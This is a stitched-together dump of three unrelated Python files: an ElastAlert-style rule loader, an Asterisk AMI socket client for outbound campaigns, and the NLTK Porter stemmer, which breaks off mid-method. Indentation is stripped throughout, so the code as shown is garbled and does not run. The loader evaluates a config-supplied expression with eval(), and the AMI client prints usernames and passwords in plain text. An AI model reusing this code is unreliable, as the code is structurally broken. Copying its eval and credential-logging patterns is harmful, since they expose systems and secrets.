if rule['timestamp_type'] == 'iso':
rule['ts_to_dt'] = ts_to_dt
rule['dt_to_ts'] = dt_to_ts
elif rule['timestamp_type'] == 'unix':
rule['ts_to_dt'] = unix_to_dt
rule['dt_to_ts'] = dt_to_unix
elif rule['timestamp_type'] == 'unix_ms':
rule['ts_to_dt'] = unixms_to_dt
rule['dt_to_ts'] = dt_to_unixms
elif rule['timestamp_type'] == 'custom':
def _ts_to_dt_with_format(ts):
return ts_to_dt_with_format(ts, ts_format=rule['timestamp_format'])
def _dt_to_ts_with_format(dt):
ts = dt_to_ts_with_format(dt, ts_format=rule['timestamp_format'])
if 'timestamp_format_expr' in rule:
# eval expression passing 'ts' and 'dt'
return eval(rule['timestamp_format_expr'], {'ts': ts, 'dt': dt})
else:
return ts
rule['ts_to_dt'] = _ts_to_dt_with_format
rule['dt_to_ts'] = _dt_to_ts_with_format
else:
            raise EAException('timestamp_type must be one of iso, unix, unix_ms, or custom')
# Add support for client ssl certificate auth
if 'verify_certs' in conf:
rule.setdefault('verify_certs', conf.get('verify_certs'))
rule.setdefault('ca_certs', conf.get('ca_certs'))
rule.setdefault('client_cert', conf.get('client_cert'))
rule.setdefault('client_key', conf.get('client_key'))
# Set HipChat options from global config
rule.setdefault('hipchat_msg_color', 'red')
rule.setdefault('hipchat_domain', 'api.hipchat.com')
rule.setdefault('hipchat_notify', True)
rule.setdefault('hipchat_from', '')
rule.setdefault('hipchat_ignore_ssl_errors', False)
# Make sure we have required options
if self.required_locals - frozenset(list(rule.keys())):
raise EAException('Missing required option(s): %s' % (', '.join(self.required_locals - frozenset(list(rule.keys())))))
if 'include' in rule and type(rule['include']) != list:
raise EAException('include option must be a list')
raw_query_key = rule.get('query_key')
if isinstance(raw_query_key, list):
if len(raw_query_key) > 1:
rule['compound_query_key'] = raw_query_key
rule['query_key'] = ','.join(raw_query_key)
elif len(raw_query_key) == 1:
rule['query_key'] = raw_query_key[0]
else:
del(rule['query_key'])
if isinstance(rule.get('aggregation_key'), list):
rule['compound_aggregation_key'] = rule['aggregation_key']
rule['aggregation_key'] = ','.join(rule['aggregation_key'])
if isinstance(rule.get('compare_key'), list):
rule['compound_compare_key'] = rule['compare_key']
rule['compare_key'] = ','.join(rule['compare_key'])
elif 'compare_key' in rule:
rule['compound_compare_key'] = [rule['compare_key']]
# Add QK, CK and timestamp to include
include = rule.get('include', ['*'])
if 'query_key' in rule:
include.append(rule['query_key'])
if 'compound_query_key' in rule:
include += rule['compound_query_key']
if 'compound_aggregation_key' in rule:
include += rule['compound_aggregation_key']
if 'compare_key' in rule:
include.append(rule['compare_key'])
if 'compound_compare_key' in rule:
include += rule['compound_compare_key']
if 'top_count_keys' in rule:
include += rule['top_count_keys']
include.append(rule['timestamp_field'])
rule['include'] = list(set(include))
# Check that generate_kibana_url is compatible with the filters
if rule.get('generate_kibana_link'):
for es_filter in rule.get('filter'):
if es_filter:
if 'not' in es_filter:
es_filter = es_filter['not']
if 'query' in es_filter:
es_filter = es_filter['query']
if list(es_filter.keys())[0] not in ('term', 'query_string', 'range'):
raise EAException(
                            'generate_kibana_link is incompatible with filters other than term, query_string and range. '
'Consider creating a dashboard and using use_kibana_dashboard instead.')
# Check that doc_type is provided if use_count/terms_query
if rule.get('use_count_query') or rule.get('use_terms_query'):
if 'doc_type' not in rule:
raise EAException('doc_type must be specified.')
# Check that query_key is set if use_terms_query
if rule.get('use_terms_query'):
if 'query_key' not in rule:
raise EAException('query_key must be specified with use_terms_query')
# Warn if use_strf_index is used with %y, %M or %D
# (%y = short year, %M = minutes, %D = full date)
if rule.get('use_strftime_index'):
for token in ['%y', '%M', '%D']:
if token in rule.get('index'):
logging.warning('Did you mean to use %s in the index? '
'The index will be formatted like %s' % (token,
datetime.datetime.now().strftime(
rule.get('index'))))
if rule.get('scan_entire_timeframe') and not rule.get('timeframe'):
raise EAException('scan_entire_timeframe can only be used if there is a timeframe specified')
def load_modules(self, rule, args=None):
""" Loads things that could be modules. Enhancements, alerts and rule type. """
# Set match enhancements
match_enhancements = []
for enhancement_name in rule.get('match_enhancements', []):
if enhancement_name in dir(enhancements):
enhancement = getattr(enhancements, enhancement_name)
else:
enhancement = get_module(enhancement_name)
if not issubclass(enhancement, enhancements.BaseEnhancement):
raise EAException("Enhancement module %s not a subclass of BaseEnhancement" % enhancement_name)
match_enhancements.append(enhancement(rule))
rule['match_enhancements'] = match_enhancements
# Convert rule type into RuleType object
if rule['type'] in self.rules_mapping:
rule['type'] = self.rules_mapping[rule['type']]
else:
rule['type'] = get_module(rule['type'])
if not issubclass(rule['type'], ruletypes.RuleType):
raise EAException('Rule module %s is not a subclass of RuleType' % (rule['type']))
# Make sure we have required alert and type options
reqs = rule['type'].required_options
if reqs - frozenset(list(rule.keys())):
raise EAException('Missing required option(s): %s' % (', '.join(reqs - frozenset(list(rule.keys())))))
# Instantiate rule
try:
rule['type'] = rule['type'](rule, args)
except (KeyError, EAException) as e:
raise EAException('Error initializing rule %s: %s' % (rule['name'], e)).with_traceback(sys.exc_info()[2])
# Instantiate alerts only if we're not in debug mode
# In debug mode alerts are not actually sent so don't bother instantiating them
if not args or not args.debug:
rule['alert'] = self.load_alerts(rule, alert_field=rule['alert'])
def load_alerts(self, rule, alert_field):
def normalize_config(alert):
"""Alert config entries are either "alertType" or {"alertType": {"key": "data"}}.
This function normalizes them both to the latter format. """
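            # For illustration (hypothetical values): the entry "email" yields
            # ("email", rule), while {"email": {"email": ["[email protected]"]}}
            # yields ("email", <shallow copy of rule updated with that config>).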
if isinstance(alert, str):
return alert, rule
elif isinstance(alert, dict):
name, config = next(iter(list(alert.items())))
config_copy = copy.copy(rule)
config_copy.update(config) # warning, this (intentionally) mutates the rule dict
return name, config_copy
else:
raise EAException()
def create_alert(alert, alert_config):
alert_class = self.alerts_mapping.get(alert) or get_module(alert)
if not issubclass(alert_class, alerts.Alerter):
raise EAException('Alert module %s is not a subclass of Alerter' % alert)
missing_options = (rule['type'].required_options | alert_class.required_options) - frozenset(
alert_config or [])
if missing_options:
raise EAException('Missing required option(s): %s' % (', '.join(missing_options)))
return alert_class(alert_config)
try:
if type(alert_field) != list:
alert_field = [alert_field]
alert_field = [normalize_config(x) for x in alert_field]
alert_field = sorted(alert_field, key=lambda a_b: self.alerts_order.get(a_b[0], 1))
# Convert all alerts into Alerter objects
alert_field = [create_alert(a, b) for a, b in alert_field]
except (KeyError, EAException) as e:
raise EAException('Error initiating alert %s: %s' % (rule['alert'], e)).with_traceback(sys.exc_info()[2])
return alert_field
@staticmethod
def adjust_deprecated_values(rule):
# From rename of simple HTTP alerter
if rule.get('type') == 'simple':
rule['type'] = 'post'
if 'simple_proxy' in rule:
rule['http_post_proxy'] = rule['simple_proxy']
if 'simple_webhook_url' in rule:
rule['http_post_url'] = rule['simple_webhook_url']
logging.warning(
'"simple" alerter has been renamed "post" and comptability may be removed in a future release.')
class FileRulesLoader(RulesLoader):
# Required global (config.yaml) configuration options for the loader
required_globals = frozenset(['rules_folder'])
def get_names(self, conf, use_rule=None):
# Passing a filename directly can bypass rules_folder and .yaml checks
if use_rule and os.path.isfile(use_rule):
return [use_rule]
rule_folder = conf['rules_folder']
rule_files = []
if 'scan_subdirectories' in conf and conf['scan_subdirectories']:
for root, folders, files in os.walk(rule_folder):
for filename in files:
if use_rule and use_rule != filename:
continue
if self.is_yaml(filename):
rule_files.append(os.path.join(root, filename))
else:
for filename in os.listdir(rule_folder):
fullpath = os.path.join(rule_folder, filename)
if os.path.isfile(fullpath) and self.is_yaml(filename):
rule_files.append(fullpath)
return rule_files
def get_hashes(self, conf, use_rule=None):
rule_files = self.get_names(conf, use_rule)
rule_mod_times = {}
for rule_file in rule_files:
rule_mod_times[rule_file] = self.get_rule_file_hash(rule_file)
return rule_mod_times
def get_yaml(self, filename):
try:
return yaml_loader(filename)
except yaml.scanner.ScannerError as e:
raise EAException('Could not parse file %s: %s' % (filename, e))
def get_import_rule(self, rule):
"""
Allow for relative paths to the import rule.
:param dict rule:
        :return: Path to the import rule
:rtype: str
"""
if os.path.isabs(rule['import']):
return rule['import']
else:
return os.path.join(os.path.dirname(rule['rule_file']), rule['import'])
def get_rule_file_hash(self, rule_file):
rule_file_hash = ''
if os.path.exists(rule_file):
with open(rule_file, 'rb') as fh:
rule_file_hash = hashlib.sha1(fh.read()).digest()
for import_rule_file in self.import_rules.get(rule_file, []):
rule_file_hash += self.get_rule_file_hash(import_rule_file)
return rule_file_hash
@staticmethod
def is_yaml(filename):
return filename.endswith('.yaml') or filename.endswith('.yml')
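# A minimal sketch of driving the file-based loader, assuming this package (and
# its bundled schema.yaml) is importable and that the hypothetical directory
# /path/to/rules exists:
def _example_load_rule_files():
    conf = {'rules_folder': '/path/to/rules', 'scan_subdirectories': True}
    loader = FileRulesLoader(conf)
    for rule_file in loader.get_names(conf):
        print(rule_file)                  # every discovered .yaml / .yml file
    return loader.get_hashes(conf)        # rule file -> hash of it and its imports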
|
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 27 20:43:15 2016
@author: pchero
"""
import socket
class MainControl(object):
sock = None
connect = False
buf = []
username = None
password = None
ip = None
port = None
data_handler = None
view_handler = None
def __init__(self):
print("MainControl init")
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return
def set_data_handler(self, handler):
self.data_handler = handler
def set_veiw_handler(self, handler):
self.view_handler = handler
def send_cmd_async(self, action, data=None):
if self.sock == None or action == None:
return
print("sendCmdAsync. action[%s], data[%s]" % (action, data))
self.sock.send("Action: %s\r\n" % action)
if data != None:
for key, value in data.items():
self.sock.send("%s: %s\r\n" % (key,value))
self.sock.send("\r\n")
return
def recv_data(self):
#print("recv_data")
if self.connect == False:
print("Not connected.")
return False
try:
buf = self.sock.recv(1)
#print("Received data. buf[%s]" % buf)
if buf == None:
return False
self.buf.append(buf)
self._message_handler()
except socket.error:
return False
return True
def _message_parser(self):
if self.buf == None:
return None
# check correct message format
if "\r\n\r\n" != ''.join(self.buf)[-4:]:
return None
data = ''.join(self.buf).split('\r\n')
self.buf = []
# Remove empty objects.
data.remove('')
data.remove('')
# create result
res = {}
try:
for msg in data:
tmp = msg.split(":", 1)
if tmp == None or len(tmp) < 2:
continue
res[tmp[0]] = tmp[1].strip()
except Exception as e:
print("Could not parse message. err[%s]" % e)
return
return res
def login_handler(self, ip=None, port=None, username=None, password=None):
print("loigin_handler. ip[%s], port[%s], username[%s], password[%s]" % (ip, port, username, password))
# set values
self.username = username
self.password = password
self.ip = ip
self.port = port
print("Check value. ip[%s], port[%s], username[%s], password[%s]" % (self.ip, self.port, self.username, self.password))
# connect async
self.sock.connect((self.ip, int(self.port)))
self.sock.setblocking(0)
data = {}
data["Username"] = self.username
data["Secret"] = self.password
print("Send command")
self.send_cmd_async("Login", data)
self.connect = True
print("check connect. connect[%s]" % self.connect)
return
def _message_handler(self):
data = self._message_parser()
if data == None:
return
# get event type
event = data.pop('Event', None)
data.pop("Privilege", None)
print("event type. event[%s]" % event)
if event == "OutCampaignEntry":
self.message_outcampaignentry(data)
return
elif event == "OutCampaignCreate":
self.message_outcampaigncreate(data)
return
elif event == "OutCampaignUpdate":
self.message_outcampaignupdate(data)
return
elif event == "OutCampaignDelete":
self.message_outcampaigndelete(data)
return
elif event == "OutPlanEntry":
self.message_outplanentry(data)
return
elif event == "OutPlanCreate":
self.message_outplancreate(data)
return
elif event == "OutPlanUpdate":
self.message_outplanupdate(data)
return
elif event == "OutPlanDelete":
self.message_outplandelete(data)
return
elif event == "OutDlmaEntry":
self.message_outdlmaentry(data)
return
elif event == "OutDlmaCreate":
self.message_outdlmacreate(data)
return
elif event == "OutDlmaUpdate":
self.message_outdlmaupdate(data)
return
elif event == "OutDlmaDelete":
self.message_outdlmadelete(data)
return
elif event == "OutDestinationEntry":
self.message_outdestinationentry(data)
return
elif event == "OutDestinationCreate":
self.message_outdestinationcreate(data)
return
elif event == "OutDestinationUpdate":
self.message_outdestinationupdate(data)
return
elif event == "OutDestinationDelete":
self.message_outdestinationdelete(data)
return
elif event == "OutDlListEntry":
self.message_outdllistentry(data)
return
elif event == "OutDlListCreate":
self.message_outdllistcreate(data)
return
elif event == "OutDlListUpdate":
self.message_outdllistupdate(data)
return
elif event == "OutDlListDelete":
self.message_outdllistdelete(data)
return
elif event == "OutDialingEntry":
self.message_outdialingentry(data)
return
elif event == "OutDialingCreate":
self.message_outdialingcreate(data)
return
elif event == "OutDialingUpdate":
self.message_outdialingupdate(data)
return
elif event == "OutDialingDelete":
self.message_outdialingdelete(data)
return
else:
print("Could not find correct message handler. event[%s]" % event)
return
def message_outcampaignentry(self, data):
'''
message handler : OutCampaignEntry
'''
print("message_outcampaignentry")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.campaign_insert(uuid, data)
return
def message_outcampaigncreate(self, data):
'''
message handler : OutCampaignCreate
'''
print("message_outcampaigncreate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.campaign_insert(uuid, data)
return
def message_outcampaignupdate(self, data):
'''
        message handler : OutCampaignUpdate
'''
print("message_outcampaignupdate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.campaign_update(uuid, data)
return
def message_outcampaigndelete(self, data):
'''
message handler : OutCampaignDelete
'''
print("message_outcampaigndelete")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.campaign_delete(uuid)
return
def message_outplanentry(self, data):
'''
message handler : OutPlanEntry
'''
print("message_outplanentry")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.plan_insert(uuid, data)
return
def message_outplancreate(self, data):
'''
message handler : OutPlanCreate
'''
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.plan_insert(uuid, data)
return
def message_outplanupdate(self, data):
'''
message handler : OutPlanUpdate
'''
print("message_outplanupdate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.plan_update(uuid, data)
return
def message_outplandelete(self, data):
'''
message handler : OutPlanDelete
'''
print("message_outplandelete")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.plan_delete(uuid)
return
def message_outdlmaentry(self, data):
'''
message handler : OutDlmaEntry
'''
print("message_outdlmaentry")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dlma_insert(uuid, data)
return
def message_outdlmacreate(self, data):
'''
message handler : OutDlmaCreate
'''
print("message_outdlmacreate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dlma_insert(uuid, data)
return
def message_outdlmaupdate(self, data):
'''
        message handler : OutDlmaUpdate
'''
print("message_outdlmaupdate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dlma_update(uuid, data)
return
def message_outdlmadelete(self, data):
'''
message handler : OutDlmaDelete
'''
print("message_outdlmadelete")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dlma_delete(uuid)
return
def message_outdestinationentry(self, data):
'''
message handler : OutDestinationEntry
'''
print("message_outdestinationentry")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.destination_insert(uuid, data)
return
def message_outdestinationcreate(self, data):
'''
message handler : OutDestinationCreate
'''
print("message_outdestinationcreate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.destination_insert(uuid, data)
return
def message_outdestinationupdate(self, data):
'''
        message handler : OutDestinationUpdate
'''
print("message_outdestinationupdate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.destination_update(uuid, data)
return
def message_outdestinationdelete(self, data):
'''
message handler : OutDestinationDelete
'''
print("message_outdestinationdelete")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.destination_delete(uuid)
return
def message_outdllistentry(self, data):
'''
message handler : OutDlListEntry
'''
print("message_outdllistentry")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.diallist_insert(uuid, data)
return
def message_outdllistcreate(self, data):
'''
message handler : OutDlListCreate
'''
print("message_outdllistcreate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.diallist_insert(uuid, data)
return
def message_outdllistupdate(self, data):
'''
message handler : OutDlListUpdate
'''
print("message_outdllistupdate")
print("Detail info. data[%s]" % data)
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.diallist_update(uuid, data)
return
def message_outdllistdelete(self, data):
'''
message handler : OutDlListDelete
'''
print("message_outdllistdelete")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.diallist_delete(uuid)
return
    def message_outdialingentry(self, data):
'''
message handler : OutDialingEntry
'''
print("message_outdialingtentry")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dialing_insert(uuid, data)
return
def message_outdialingcreate(self, data):
'''
message handler : OutDialingCreate
'''
print("message_outdialingcreate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dialing_insert(uuid, data)
return
def message_outdialingupdate(self, data):
'''
message handler : OutDialingUpdate
'''
print("message_outdialingupdate")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dialing_update(uuid, data)
return
def message_outdialingdelete(self, data):
'''
message handler : OutDialingDelete
'''
print("message_outdialingdelete")
if data == None or "Uuid" not in data:
return
# get uuid
uuid = data["Uuid"]
if uuid == None:
return
self.data_handler.dialing_delete(uuid)
return
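# A minimal sketch of the AMI-style framing that _message_parser() expects:
# "Key: Value" lines separated by CRLF and terminated by a blank line. The
# event below is a made-up example.
def _example_parse_message():
    ctrl = MainControl()
    raw = "Event: OutCampaignEntry\r\nUuid: 1234-abcd\r\n\r\n"
    ctrl.buf = list(raw)              # recv_data() appends one byte at a time
    print(ctrl._message_parser())     # -> {'Event': 'OutCampaignEntry', 'Uuid': '1234-abcd'}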
|
|
# Copyright (c) 2002 Vivake Gupta (vivakeATomniscia.org). All rights reserved.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
# This software is maintained by Vivake (vivakeATomniscia.org) and is available at:
# http://www.omniscia.org/~vivake/python/PorterStemmer.py
#
# Additional modifications were made to incorporate this module into
# NLTK. All such modifications are marked with "--NLTK--". The NLTK
# version of this module is maintained by NLTK developers,
# and is available via http://www.nltk.org/
#
# GNU Linking Exception:
# Using this module statically or dynamically with other modules is
# making a combined work based on this module. Thus, the terms and
# conditions of the GNU General Public License cover the whole combination.
# As a special exception, the copyright holders of this module give
# you permission to combine this module with independent modules to
# produce an executable program, regardless of the license terms of these
# independent modules, and to copy and distribute the resulting
# program under terms of your choice, provided that you also meet,
# for each linked independent module, the terms and conditions of
# the license of that module. An independent module is a module which
# is not derived from or based on this module. If you modify this module,
# you may extend this exception to your version of the module, but you
# are not obliged to do so. If you do not wish to do so, delete this
# exception statement from your version.
"""
Porter Stemmer
This is the Porter stemming algorithm, ported to Python from the
version coded up in ANSI C by the author. It follows the algorithm
presented in
Porter, M. "An algorithm for suffix stripping." Program 14.3 (1980): 130-137.
only differing from it at the points marked --DEPARTURE-- and --NEW--
below.
For a more faithful version of the Porter algorithm, see
http://www.tartarus.org/~martin/PorterStemmer/
Later additions:
June 2000
The 'l' of the 'logi' -> 'log' rule is put with the stem, so that
short stems like 'geo' 'theo' etc work like 'archaeo' 'philo' etc.
This follows a suggestion of Barry Wilkins, research student at
Birmingham.
February 2000
the cvc test for not dropping final -e now looks after vc at the
beginning of a word, so are, eve, ice, ore, use keep final -e. In this
test c is any consonant, including w, x and y. This extension was
suggested by Chris Emerson.
-fully -> -ful treated like -fulness -> -ful, and
-tionally -> -tion treated like -tional -> -tion
both in Step 2. These were suggested by Hiranmay Ghosh, of New Delhi.
Invariants proceed, succeed, exceed. Also suggested by Hiranmay Ghosh.
Additional modifications were made to incorporate this module into
nltk. All such modifications are marked with \"--NLTK--\". The nltk
version of this module is maintained by the NLTK developers, and is
available from <http://nltk.sourceforge.net>
"""
from __future__ import print_function
## --NLTK--
## Declare this module's documentation format.
__docformat__ = 'plaintext'
import sys
import re
## --NLTK--
## Import the nltk.stemmer module, which defines the stemmer interface
from api import StemmerI
class PorterStemmer(StemmerI):
## --NLTK--
## Add a module docstring
"""
A word stemmer based on the Porter stemming algorithm.
Porter, M. \"An algorithm for suffix stripping.\"
Program 14.3 (1980): 130-137.
A few minor modifications have been made to Porter's basic
algorithm. See the source code of this module for more
information.
The Porter Stemmer requires that all tokens have string types.
"""
# The main part of the stemming algorithm starts here.
# b is a buffer holding a word to be stemmed. The letters are in b[k0],
# b[k0+1] ... ending at b[k]. In fact k0 = 0 in this demo program. k is
# readjusted downwards as the stemming progresses. Zero termination is
# not in fact used in the algorithm.
# Note that only lower case sequences are stemmed. Forcing to lower case
# should be done before stem(...) is called.
def __init__(self):
self.b = "" # buffer for word to be stemmed
self.k = 0
self.k0 = 0
self.j = 0 # j is a general offset into the string
## --NEW--
## This is a table of irregular forms. It is quite short, but still
## reflects the errors actually drawn to Martin Porter's attention over
## a 20 year period!
##
## Extend it as necessary.
##
## The form of the table is:
## {
## "p1" : ["s11","s12","s13", ... ],
## "p2" : ["s21","s22","s23", ... ],
## ...
## "pn" : ["sn1","sn2","sn3", ... ]
## }
##
## String sij is mapped to paradigm form pi, and the main stemming
## process is then bypassed.
irregular_forms = {
"sky" : ["sky", "skies"],
"die" : ["dying"],
"lie" : ["lying"],
"tie" : ["tying"],
"news" : ["news"],
"inning" : ["innings", "inning"],
"outing" : ["outings", "outing"],
"canning" : ["cannings", "canning"],
"howe" : ["howe"],
# --NEW--
"proceed" : ["proceed"],
"exceed" : ["exceed"],
"succeed" : ["succeed"], # Hiranmay Ghosh
}
self.pool = {}
for key in irregular_forms:
for val in irregular_forms[key]:
self.pool[val] = key
def cons(self, i):
"""cons(i) is TRUE <=> b[i] is a consonant."""
if self.b[i] == 'a' or self.b[i] == 'e' or self.b[i] == 'i' or self.b[i] == 'o' or self.b[i] == 'u':
return 0
if self.b[i] == 'y':
if i == self.k0:
return 1
else:
return (not self.cons(i - 1))
return 1
def m(self):
"""m() measures the number of consonant sequences between k0 and j.
if c is a consonant sequence and v a vowel sequence, and <..>
indicates arbitrary presence,
<c><v> gives 0
<c>vc<v> gives 1
<c>vcvc<v> gives 2
<c>vcvcvc<v> gives 3
....
"""
n = 0
i = self.k0
while 1:
if i > self.j:
return n
if not self.cons(i):
break
i = i + 1
i = i + 1
while 1:
while 1:
if i > self.j:
return n
if self.cons(i):
break
i = i + 1
i = i + 1
n = n + 1
while 1:
if i > self.j:
return n
if not self.cons(i):
break
i = i + 1
i = i + 1
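    # Worked examples, using words from Porter's paper: "tree" and "by" contain
    # no vowel-consonant pair, so m() == 0; "trouble" and "oats" give m() == 1;
    # "troubles" and "private" give m() == 2 -- each VC pair in the
    # <c>(vc){m}<v> decomposition adds one.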
def vowelinstem(self):
"""vowelinstem() is TRUE <=> k0,...j contains a vowel"""
for i in range(self.k0, self.j + 1):
if not self.cons(i):
return 1
return 0
def doublec(self, j):
"""doublec(j) is TRUE <=> j,(j-1) contain a double consonant."""
if j < (self.k0 + 1):
return 0
if (self.b[j] != self.b[j-1]):
return 0
return self.cons(j)
def cvc(self, i):
"""cvc(i) is TRUE <=>
a) ( --NEW--) i == 1, and p[0] p[1] is vowel consonant, or
b) p[i - 2], p[i - 1], p[i] has the form consonant -
vowel - consonant and also if the second c is not w, x or y. this
is used when trying to restore an e at the end of a short word.
e.g.
cav(e), lov(e), hop(e), crim(e), but
snow, box, tray.
"""
if i == 0: return 0 # i == 0 never happens perhaps
if i == 1: return (not self.cons(0) and self.cons(1))
if not self.cons(i) or self.cons(i-1) or not self.cons(i-2): return 0
ch = self.b[i]
if ch == 'w' or ch == 'x' or ch == 'y':
return 0
return 1
def ends(self, s):
"""ends(s) is TRUE <=> k0,...k ends with the string s."""
length = len(s)
if s[length - 1] != self.b[self.k]: # tiny speed-up
return 0
if length > (self.k - self.k0 + 1):
return 0
if self.b[self.k-length+1:self.k+1] != s:
return 0
self.j = self.k - length
return 1
def setto(self, s):
"""setto(s) sets (j+1),...k to the characters in the string s, readjusting k."""
length = len(s)
self.b = self.b[:self.j+1] + s + self.b[self.j+length+1:]
self.k = self.j + length
def r(self, s):
"""r(s) is used further down."""
if self.m() > 0:
self.setto(s)
def step1ab(self):
"""step1ab() gets rid of plurals and -ed or -ing. e.g.
caresses -> caress
ponies -> poni
sties -> sti
tie -> tie (--NEW--: see below)
caress -> caress
cats -> cat
feed -> feed
agreed -> agree
disabled -> disable
matting -> mat
mating -> mate
meeting -> meet
milling -> mill
messing -> mess
meetings -> meet
"""
if self.b[self.k] == 's':
if self.ends("sses"):
self.k = self.k - 2
elif self.ends("ies"):
if self.j == 0:
self.k = self.k - 1
# this line extends the original algorithm, so that
# 'flies'->'fli' but 'dies'->'die' etc
else:
self.k = self.k - 2
elif self.b[self.k - 1] != 's':
self.k = self.k - 1
if self.ends("ied"):
if self.j == 0:
self.k = self.k - 1
else:
self.k = self.k - 2
# this line extends the original algorithm, so that
# 'spied'->'spi' but 'died'->'die' etc
elif self.ends("eed"):
if self.m() > 0:
self.k = self.k - 1
elif (self.ends("ed") or self.ends("ing")) and self.vowelinstem():
self.k = self.j
if self.ends("at"): self.setto("ate")
elif self.ends("bl"): self.setto("ble")
elif self.ends("iz"): self.setto("ize")
elif self.doublec(self.k):
self.k = self.k - 1
ch = self.b[self.k]
if ch == 'l' or ch == 's' or ch == 'z':
self.k = self.k + 1
elif (self.m() == 1 and self.cvc(self.k)):
self.setto("e")
def step1c(self):
"""step1c() turns terminal y to i when there is another vowel in the stem.
--NEW--: This has been modified from the original Porter algorithm so that y->i
is only done when y is preceded by a consonant, but not if the stem
is only a single consonant, i.e.
(*c and not c) Y -> I
So 'happy' -> 'happi', but
'enjoy' -> 'enjoy' etc
This is a much better rule. Formerly 'enjoy'->'enjoi' and 'enjoyment'->
'enjoy'. Step 1c is perhaps done too soon; but with this modification that
no longer really matters.
Also, the removal of the vowelinstem(z) condition means that 'spy', 'fly',
'try' ... stem to 'spi', 'fli', 'tri' and conflate with 'spied', 'tried',
'flies' ...
"""
if self.ends("y") and self.j > 0 and self.cons(self.k - 1):
self.b = self.b[:self.k] + 'i' + self.b[self.k+1:]
def step2(self):
"""step2() maps double suffices to single ones.
so -ization ( = -ize plus -ation) maps to -ize etc. note that the
string before the suffix must give m() > 0.
"""
if self.b[self.k - 1] == 'a':
if self.ends("ational"): self.r("ate")
elif self.ends("tional"): self.r("tion")
elif self.b[self.k - 1] == 'c':
if self.ends("enci"): self.r("ence")
elif self.ends("anci"): self.r("ance")
elif self.b[self.k - 1] == 'e':
if self.ends("izer"): self.r("ize")
elif self.b[self.k - 1] == 'l':
if self.ends("bli"): self.r("ble") # --DEPARTURE--
# To match the published algorithm, replace this phrase with
# if self.ends("abli"): self.r("able")
elif self.ends("alli"):
if self.m() > 0: # --NEW--
self.setto("al")
self.step2()
elif self.ends("fulli"): self.r("ful") # --NEW--
elif self.ends("entli"): self.r("ent")
elif self.ends("eli"): self.r("e")
elif self.ends("ousli"): self.r("ous")
elif self.b[self.k - 1] == 'o':
if self.ends("ization"): self.r("ize")
elif self.ends("ation"): self.r("ate")
elif self.ends("ator"): self.r("ate")
elif self.b[self.k - 1] == 's':
if self.ends("alism"): self.r("al")
elif self.ends("iveness"): self.r("ive")
elif self.ends("fulness"): self.r("ful")
elif self.ends("ousness"): self.r("ous")
elif self.b[self.k - 1] == 't':
if self.ends("aliti"): self.r("al")
elif self.ends("iviti"): self.r("ive")
elif self.ends("biliti"): self.r("ble")
elif self.b[self.k - 1] == 'g': # --DEPARTURE--
if self.ends("logi"):
self.j = self.j + 1 # --NEW-- (Barry Wilkins)
self.r("og")
# To match the published algorithm, delete this phrase
def step3(self):
"""step3() dels with -ic-, -full, -ness etc. similar strategy to step2."""
if self.b[self.k] == 'e':
if self.ends("icate"): self.r("ic")
elif self.ends("ative"): self.r("")
elif self.ends("alize"): self.r("al")
elif self.b[self.k] == 'i':
if self.ends("iciti"): self.r("ic")
elif self.b[self.k] == 'l':
if self.ends("ical"): self.r("ic")
elif self.ends("ful"): self.r("")
elif self.b[self.k] == 's':
if self.ends("ness"): self.r("")
def step4(self):
"""step4() takes off -ant, -ence etc., in context <c>vcvc<v>."""
if self.b[self.k - 1] == 'a':
if self.ends("al"): pass
else: return
elif self.b[self.k - 1] == 'c':
if self.ends("ance"): pass
elif self.ends("ence"): pass
else: return
elif self.b[self.k - 1] == 'e':
if self.ends("er"): pass
